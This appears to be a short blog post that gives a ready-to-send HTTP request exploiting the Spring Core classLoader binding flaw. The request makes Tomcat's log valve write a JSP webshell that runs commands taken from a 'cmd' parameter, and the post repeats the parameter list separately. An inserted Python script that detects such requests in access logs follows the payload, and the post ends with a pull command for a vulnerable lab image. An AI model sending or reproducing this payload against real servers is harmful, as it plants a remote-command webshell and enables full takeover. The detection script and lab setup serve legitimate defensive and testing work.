Spring Core RCE payload

GET /?class.module.classLoader.resources.context.parent.parent.appBase=./&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=_4&class.module.classLoader.resources.context.parent.pipeline.first.checkExists=true&class.module.classLoader.resources.context.parent.pipeline.first.rotatable=true&class.module.classLoader.resources.context.parent.pipeline.first.prefix=test1&class.module.classLoader.resources.context.parent.pipeline.first.buffered=false&class.module.classLoader.resources.context.parent.pipeline.first.pattern=%3Cjsp%3Ascriptlet%3Eout.println(Runtime.getRuntime().exec(request.getParameter(%22cmd%22)))%3B%3C%2Fjsp%3Ascriptlet%3E HTTP/1.1
Host: 192.168.x.x:8082
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

 

 

?class.module.classLoader.resources.context.parent.parent.appBase=./&
class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&
class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=_4&
class.module.classLoader.resources.context.parent.pipeline.first.checkExists=true&
class.module.classLoader.resources.context.parent.pipeline.first.rotatable=true&
class.module.classLoader.resources.context.parent.pipeline.first.prefix=test1&
class.module.classLoader.resources.context.parent.pipeline.first.buffered=false&
class.module.classLoader.resources.context.parent.pipeline.first.pattern=%3Cjsp%3Ascriptlet%3Eout.println(Runtime.getRuntime().exec(request.getParameter(%22cmd%22)))%3B%3C%2Fjsp%3Ascriptlet%3E
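
A detection check for the request above, added here as an example (not code from the original post): it scans raw request lines or access-log lines for parameter names that walk through `class` / `classLoader`, after percent-decoding and ignoring case. The log lines are constructed and the function names are hypothetical.

```python
import re
from urllib.parse import unquote_plus

# Matches the request target in a raw request line or a quoted access-log entry.
REQUEST_RE = re.compile(r"\b[A-Z]+ (\S+) HTTP/\d")

def binding_path_hits(query):
    """Return {param_name: value} for names that traverse `class` or `classLoader`."""
    hits = {}
    for pair in re.split(r"[&;]", query):
        raw_name, _, raw_value = pair.partition("=")
        name = unquote_plus(raw_name)  # decode %2E etc. before inspecting the name
        # Split the property path on dots and index brackets; compare case-insensitively.
        segments = [s for s in re.split(r"[.\[\]'\"]+", name.lower()) if s]
        # A lone "class" field is an ordinary form field; "class.<something>" is a bean walk.
        if "classloader" in segments or "class" in segments[:-1]:
            hits[name] = unquote_plus(raw_value)
    return hits

def scan(lines):
    """Return [(line_number, hits)] for every line whose query string has such names."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = match.group(1).partition("?")[2]
        hits = binding_path_hits(query)
        if hits:
            findings.append((number, hits))
    return findings

# Constructed sample log lines (documentation IP range, shortened parameter set).
PREFIX = "class.module.classLoader.resources.context.parent.pipeline.first."
ENCODED = PREFIX.replace(".", "%2E")
SAMPLE_LOG = [
    '198.51.100.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index?class=math&page=2 HTTP/1.1" 200 512',
    f'198.51.100.11 - - [01/Jan/2024:10:00:05 +0000] "GET /?{PREFIX}prefix=test1&{PREFIX}suffix=.jsp HTTP/1.1" 200 512',
    f'198.51.100.12 - - [01/Jan/2024:10:00:09 +0000] "GET /?{ENCODED}fileDateFormat=_4 HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        for name, value in hits.items():
            print(f"line {number}: {name} = {value!r}")
```

The decoded values of the `prefix`, `suffix` and `fileDateFormat` hits tell a responder which file name to look for on the server.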

 

Vulnerable environment:

docker pull vulfocus/spring-core-rce-2022-03-29

 

 

posted @ sevck